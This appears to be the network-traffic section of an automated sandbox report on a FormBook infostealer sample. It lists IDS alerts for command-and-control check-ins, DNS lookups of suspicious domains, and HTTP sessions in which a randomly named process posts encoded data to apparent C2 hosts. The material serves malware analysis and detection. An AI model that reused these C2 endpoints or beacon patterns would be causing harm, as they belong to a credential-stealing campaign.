2025-01-11T07:59:20.769032+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50009	101.32.205.61	80	TCP
2025-01-11T07:59:23.799409+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50010	101.32.205.61	80	TCP
2025-01-11T07:59:23.799409+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50010	101.32.205.61	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 07:58:27.498748064 CET	49828	80	192.168.2.4	172.217.18.115
Jan 11, 2025 07:58:27.503648043 CET	80	49828	172.217.18.115	192.168.2.4
Jan 11, 2025 07:58:27.503731966 CET	49828	80	192.168.2.4	172.217.18.115
Jan 11, 2025 07:58:27.519133091 CET	49828	80	192.168.2.4	172.217.18.115
Jan 11, 2025 07:58:27.524027109 CET	80	49828	172.217.18.115	192.168.2.4
Jan 11, 2025 07:58:28.281361103 CET	80	49828	172.217.18.115	192.168.2.4
Jan 11, 2025 07:58:28.282247066 CET	80	49828	172.217.18.115	192.168.2.4
Jan 11, 2025 07:58:28.283233881 CET	49828	80	192.168.2.4	172.217.18.115
Jan 11, 2025 07:58:28.284812927 CET	49828	80	192.168.2.4	172.217.18.115
Jan 11, 2025 07:58:28.289668083 CET	80	49828	172.217.18.115	192.168.2.4
Jan 11, 2025 07:58:51.473196983 CET	49984	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:51.478076935 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:51.478202105 CET	49984	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:51.494385004 CET	49984	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:51.499242067 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:52.128587961 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:52.128608942 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:52.128645897 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:52.128652096 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:52.128657103 CET	49984	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:52.128659010 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:52.128693104 CET	49984	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:52.128700972 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:52.128716946 CET	80	49984	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:52.128736973 CET	49984	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:52.128767014 CET	49984	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:53.009501934 CET	49984	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:54.028650999 CET	50001	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:54.033492088 CET	80	50001	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:54.033586979 CET	50001	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:54.049612999 CET	50001	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:54.054517031 CET	80	50001	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:54.687753916 CET	80	50001	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:54.687772989 CET	80	50001	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:54.687797070 CET	80	50001	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:54.687813044 CET	80	50001	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:54.687824011 CET	80	50001	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:54.687838078 CET	50001	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:54.687848091 CET	80	50001	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:54.687890053 CET	50001	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:54.687916040 CET	50001	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:55.556617975 CET	50001	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:56.575261116 CET	50005	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:56.580216885 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.580391884 CET	50005	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:56.602050066 CET	50005	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:56.607059956 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.607091904 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.607112885 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.607127905 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.607176065 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.607181072 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.607287884 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.607300997 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:56.607325077 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:57.260889053 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:57.260904074 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:57.260919094 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:57.260941029 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:57.260951996 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:57.260967970 CET	80	50005	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:57.261003971 CET	50005	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:57.261075974 CET	50005	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:58.118869066 CET	50005	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:59.138797998 CET	50006	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:59.143795967 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.143980026 CET	50006	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:59.154455900 CET	50006	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:59.159499884 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.786290884 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.786324978 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.786338091 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.786350965 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.786361933 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.786379099 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.786516905 CET	50006	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:59.786695004 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:58:59.786745071 CET	50006	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:59.791470051 CET	50006	80	192.168.2.4	194.9.94.86
Jan 11, 2025 07:58:59.796300888 CET	80	50006	194.9.94.86	192.168.2.4
Jan 11, 2025 07:59:14.412849903 CET	50007	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:14.417818069 CET	80	50007	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:14.417908907 CET	50007	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:14.437014103 CET	50007	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:14.441931009 CET	80	50007	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:15.347745895 CET	80	50007	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:15.347825050 CET	80	50007	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:15.347889900 CET	50007	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:15.946954012 CET	50007	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:16.973076105 CET	50008	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:16.977900028 CET	80	50008	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:16.978013039 CET	50008	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:16.993103027 CET	50008	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:16.998011112 CET	80	50008	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:17.870616913 CET	80	50008	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:17.870805025 CET	80	50008	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:17.870863914 CET	50008	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:18.509516001 CET	50008	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:19.842819929 CET	50009	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:19.847762108 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.847851992 CET	50009	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:19.865181923 CET	50009	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:19.870990038 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.871026993 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.871054888 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.871083021 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.871115923 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.871144056 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.871170998 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.871505976 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:19.871536970 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:20.768802881 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:20.768970966 CET	80	50009	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:20.769032001 CET	50009	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:21.368779898 CET	50009	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:22.715473890 CET	50010	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:22.720331907 CET	80	50010	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:22.720410109 CET	50010	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:22.730654955 CET	50010	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:22.735421896 CET	80	50010	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:23.799175024 CET	80	50010	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:23.799225092 CET	80	50010	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:23.799279928 CET	80	50010	101.32.205.61	192.168.2.4
Jan 11, 2025 07:59:23.799408913 CET	50010	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:23.802516937 CET	50010	80	192.168.2.4	101.32.205.61
Jan 11, 2025 07:59:23.807497025 CET	80	50010	101.32.205.61	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 07:58:27.422239065 CET	50203	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:58:27.474373102 CET	53	50203	1.1.1.1	192.168.2.4
Jan 11, 2025 07:58:43.325759888 CET	56090	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:58:43.336997986 CET	53	56090	1.1.1.1	192.168.2.4
Jan 11, 2025 07:58:51.403650045 CET	51745	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:58:51.470607042 CET	53	51745	1.1.1.1	192.168.2.4
Jan 11, 2025 07:59:04.810374022 CET	54509	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:59:05.799133062 CET	53	54509	1.1.1.1	192.168.2.4
Jan 11, 2025 07:59:13.856869936 CET	52684	53	192.168.2.4	1.1.1.1
Jan 11, 2025 07:59:14.409467936 CET	53	52684	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 07:58:27.422239065 CET	192.168.2.4	1.1.1.1	0xf8e8	Standard query (0)	www.bacoonbase.online	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:58:43.325759888 CET	192.168.2.4	1.1.1.1	0x11e0	Standard query (0)	www.kevmedia.online	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:58:51.403650045 CET	192.168.2.4	1.1.1.1	0x3861	Standard query (0)	www.myndighetssupport.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:04.810374022 CET	192.168.2.4	1.1.1.1	0xbe70	Standard query (0)	www.dfr88.top	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:13.856869936 CET	192.168.2.4	1.1.1.1	0xcfd2	Standard query (0)	www.rwse6wjx.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 07:58:27.474373102 CET	1.1.1.1	192.168.2.4	0xf8e8	No error (0)	www.bacoonbase.online	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:58:27.474373102 CET	1.1.1.1	192.168.2.4	0xf8e8	No error (0)	ghs.googlehosted.com		172.217.18.115	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:58:43.336997986 CET	1.1.1.1	192.168.2.4	0x11e0	Server failure (2)	www.kevmedia.online	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:58:51.470607042 CET	1.1.1.1	192.168.2.4	0x3861	No error (0)	www.myndighetssupport.org		194.9.94.86	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:58:51.470607042 CET	1.1.1.1	192.168.2.4	0x3861	No error (0)	www.myndighetssupport.org		194.9.94.85	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:05.799133062 CET	1.1.1.1	192.168.2.4	0xbe70	Name error (3)	www.dfr88.top	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 07:59:14.409467936 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	www.rwse6wjx.sbs	b1-3-r11-gmhudx.t9d2quy5.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:14.409467936 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	b1-3-r11-gmhudx.t9d2quy5.shop	b1-3-r11.t9d2quy5.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:14.409467936 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	b1-3-r11.t9d2quy5.shop	b1-3-r111-s65psj.8uqm5xgy.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:14.409467936 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	b1-3-r111-s65psj.8uqm5xgy.shop	b1-3-r11-nff52.alicloudddos.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:14.409467936 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	b1-3-r11-nff52.alicloudddos.top	b1-3-r111-s65psj.alicloudddos.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:14.409467936 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	b1-3-r111-s65psj.alicloudddos.top	b1-3-r111-55g56.kunlundns.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:14.409467936 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	b1-3-r111-55g56.kunlundns.top	b1-3-r111.kunlundns.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 07:59:14.409467936 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	b1-3-r111.kunlundns.top		101.32.205.61	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.bacoonbase.online

www.myndighetssupport.org

www.rwse6wjx.sbs

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49828	172.217.18.115	80	5568	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:58:27.519133091 CET	499	OUT	GET /tbkw/?6v=eEnz25iqeyYaF0GZTcv88p8ZheMBIwFv/cURASnuQ31RxRodHZdUyBKgSTxpQbZzoYYkqPhfe/QfRzqscmGfeGTCq96n+NHffCm4V1X8Y6SambU/LVK/pU0=&f2yX=YHuxGZkXvzspJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.bacoonbase.online Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4
Jan 11, 2025 07:58:28.281361103 CET	552	IN	HTTP/1.1 301 Moved Permanently Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 06:58:28 GMT Location: https://www.bacoonbase.online/tbkw/?6v=eEnz25iqeyYaF0GZTcv88p8ZheMBIwFv/cURASnuQ31RxRodHZdUyBKgSTxpQbZzoYYkqPhfe/QfRzqscmGfeGTCq96n+NHffCm4V1X8Y6SambU/LVK/pU0%3D&f2yX=YHuxGZkXvzspJ Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49984	194.9.94.86	80	5568	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:58:51.494385004 CET	783	OUT	POST /2k8x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.myndighetssupport.org Origin: http://www.myndighetssupport.org Referer: http://www.myndighetssupport.org/2k8x/ Cache-Control: max-age=0 Connection: close Content-Length: 199 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4 Data Raw: 36 76 3d 30 6c 44 39 45 69 6f 6c 44 68 46 59 63 49 42 75 6c 50 72 77 64 76 44 4a 43 6f 64 4f 33 67 67 4e 6f 46 2b 67 37 2b 72 51 78 2f 6a 75 30 44 73 52 48 33 34 6d 6f 6c 43 5a 36 55 67 48 38 4e 68 30 50 59 72 6f 50 30 6a 72 63 2b 49 71 4b 43 34 33 64 53 6b 4f 4a 77 6a 47 7a 69 7a 46 30 6d 79 4c 52 56 6b 4e 66 54 39 78 61 41 66 43 39 57 50 67 53 59 58 68 71 36 63 73 39 36 73 50 48 6f 43 71 65 32 39 51 42 6f 57 5a 74 48 49 6a 49 4d 56 56 71 41 61 73 70 67 56 30 6e 43 6a 4c 4c 53 4c 52 48 59 53 33 67 65 62 39 69 6e 33 57 6b 42 31 64 47 54 41 55 39 4b 72 46 39 31 76 46 5a 59 4f 39 57 41 3d 3d Data Ascii: 6v=0lD9EiolDhFYcIBulPrwdvDJCodO3ggNoF+g7+rQx/ju0DsRH34molCZ6UgH8Nh0PYroP0jrc+IqKC43dSkOJwjGzizF0myLRVkNfT9xaAfC9WPgSYXhq6cs96sPHoCqe29QBoWZtHIjIMVVqAaspgV0nCjLLSLRHYS3geb9in3WkB1dGTAU9KrF91vFZYO9WA==
Jan 11, 2025 07:58:52.128587961 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 06:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 11, 2025 07:58:52.128608942 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 11, 2025 07:58:52.128645897 CET	448	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 11, 2025 07:58:52.128652096 CET	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Jan 11, 2025 07:58:52.128659010 CET	1236	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Jan 11, 2025 07:58:52.128700972 CET	430	IN	Data Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	50001	194.9.94.86	80	5568	C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:58:54.049612999 CET	803	OUT	POST /2k8x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.myndighetssupport.org Origin: http://www.myndighetssupport.org Referer: http://www.myndighetssupport.org/2k8x/ Cache-Control: max-age=0 Connection: close Content-Length: 219 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/45.0.2454.68 Mobile/12B466 Safari/600.1.4 Data Raw: 36 76 3d 30 6c 44 39 45 69 6f 6c 44 68 46 59 4f 38 46 75 6e 73 44 77 49 2f 44 4b 42 6f 64 4f 35 41 67 52 6f 46 36 67 37 2f 76 2b 78 71 54 75 30 68 30 52 45 79 45 6d 76 6c 43 5a 75 6b 67 43 32 74 68 76 50 59 58 4b 50 32 33 72 63 2b 63 71 4b 43 49 33 65 68 4d 42 49 67 6a 41 2b 43 7a 48 77 6d 79 4c 52 56 6b 4e 66 54 35 4c 61 41 6e 43 38 6d 66 67 64 64 6a 2b 6a 61 63 76 2b 36 73 50 52 59 43 75 65 32 39 6d 42 71 69 33 74 45 77 6a 49 4a 70 56 72 52 61 6a 38 77 56 79 70 69 69 2f 4b 69 37 56 45 61 58 6d 6d 4e 36 53 67 6e 44 6e 68 48 34 48 58 69 68 44 76 4b 50 32 67 79 6d 78 55 62 7a 30 4e 42 38 6f 6f 4a 43 61 46 4a 71 42 33 4e 74 36 6c 41 59 78 67 33 73 3d Data Ascii: 6v=0lD9EiolDhFYO8FunsDwI/DKBodO5AgRoF6g7/v+xqTu0h0REyEmvlCZukgC2thvPYXKP23rc+cqKCI3ehMBIgjA+CzHwmyLRVkNfT5LaAnC8mfgddj+jacv+6sPRYCue29mBqi3tEwjIJpVrRaj8wVypii/Ki7VEaXmmN6SgnDnhH4HXihDvKP2gymxUbz0NB8ooJCaFJqB3Nt6lAYxg3s=
